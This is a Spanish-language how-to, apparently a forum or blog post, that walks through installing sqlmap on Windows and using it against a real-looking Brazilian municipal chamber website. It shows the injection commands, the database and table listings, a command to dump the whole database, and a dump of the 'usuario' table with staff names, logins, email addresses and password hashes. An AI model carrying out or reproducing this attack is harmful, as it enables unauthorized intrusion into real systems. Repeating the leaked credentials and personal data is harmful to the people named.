Inyecciones Sqlmap




vamos hacer una inyeccion SQLMAP desde Windows
lo primero que vamos hacer es descargar las herramientas trabajar en windows


python 
download

 sqlmap 
download

despues que descargamos sqlmap  lo buscamos y lo ponemos en la unidada  C:
despues que esta en la carpeta le cambiamos el nombre para que sea mas facil le ponemos sqlmap
vamos a Inicio  y escribimos CMD

escribimos cd/sqlmap
ahora ponemos  
C:\sqlmap>sqlmap.py -u http://www.camaralages.sc.gov.br/informativos/index/?id=42 --dbs

nos sale este mensaje le damos que no porque el paramento es vulne no queremos que busque mas


[20:47:23] [INFO] target URL appears to have 4 columns in query
[20:47:28] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 colu
mns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any
)? [y/N] n
sqlmap identified the following injection points with a total of 46 HTTP(s) requ
ests:

como vemos nos muestra dos base de dato
entonce lo que tenemos que hacer es  seguir la guia poniendo unas de las dos tablas que seria  haci
[*] camaralages
[*] information_schema

sqlmap.py -u http://www.camaralages.sc.gov.br/informativos/index/?id=42 -D camaralages --tables

Database: camaralages
[35 tables]
+--------------------------+
| banner_popup             |
| biblioteca               |
| bibliotecagaleria        |
| bloquei                  |
| camara                   |
| camaragaleria            |
| escolalegislativo        |
| escolalegislativogaleria |
| espaco                   |
| espacogaleria            |
| historico                |
| historico_login          |
| informativo              |
| j_vereador               |
| j_vereador_galeria       |
| jovem_vereador           |
| licitacao                |
| licitacao_documento      |
| memorias                 |
| memoriasgaleria          |
| museu                    |
| museugaleria             |
| noticia                  |
| noticia_comentario       |
| noticiagaleria           |
| radio                    |
| radioprogramacao         |
| radiotexto               |
| tv                       |
| tvprogramacao            |
| tvtexto                  |
| usuario                  |
| vereadores               |
| vereadores_comissao      |
| vereadores_mesa          |
+--------------------------+

[21:19:33] [INFO] fetched data logged to text files under 'C:\Users\tempo\.sqlma
p\output\www.camaralages.sc.gov.br'
C:\sqlmap>     como vemos nos acaba de mostrar todas su tables  buscamos la que nos interesa 
oh si quieren descargarce toda la base de data entonce hacemos haci

sqlmap.py -u http://www.camaralages.sc.gov.br/informativos/index/?id=42 -D camaralages --dump >data.txt   escaneara todo y se guardara en un archivo txt en la unidad C:\sqlmap
oh empecemos desde cero  buscamos en la tables lo que deceamos buscar que es el username y password  que viene siendo 

sqlmap.py -u http://www.camaralages.sc.gov.br/informativos/index/?id=4 -D camaralages -T usuario --dump 


Database: camaralages
Table: usuario
[5 entries]
+------------+----------------+-------+----------------------------------+------
----------------+----------------------------------+----------------------------
------+
| id_usuario | nome           | nivel | senha                            | login
                | email                            | imagem
      |
+------------+----------------+-------+----------------------------------+------
----------------+----------------------------------+----------------------------
------+
| 9          | Flaviano       | 1     | da561088d345f16db12379e329e8924c | flavi
ano@camaralages | flaviano@camaralages.sc.gov.br   | <blank>
      |
| 12         | Everton        | 1     | 711536710706e16920b980bd563c1d61 | evert
on@camaralages  | everton@camaralages.sc.gov.br    | <blank>
      |
| 13         | Maurício Pezzi | 4     | 711536710706e16920b980bd563c1d61 | mauri
cio@camaralages | mauricio@camaralages.sc.gov.br   | /capa/050814140725722614072
57226 |
| 14         | Janelize       | 1     | 856abed2aad7c14e8ab1904c7babee3e | lize
                | lizeborges@camaralages.sc.gov.br | /capa/050814140726421314072
64213 |
| 15         | Flavia Mota    | 1     | 711536710706e16920b980bd563c1d61 | flavi
a               | flavia@camaralages.sc.gov.br     | /capa/050814140726427114072
64271 |
+------------+----------------+-------+----------------------------------+------
----------------+----------------------------------+----------------------------
------+


sqlmap.py -u http://www.camaralages.sc.gov.br/informativos/index/?id=4 -D camaralages -T usuario --columns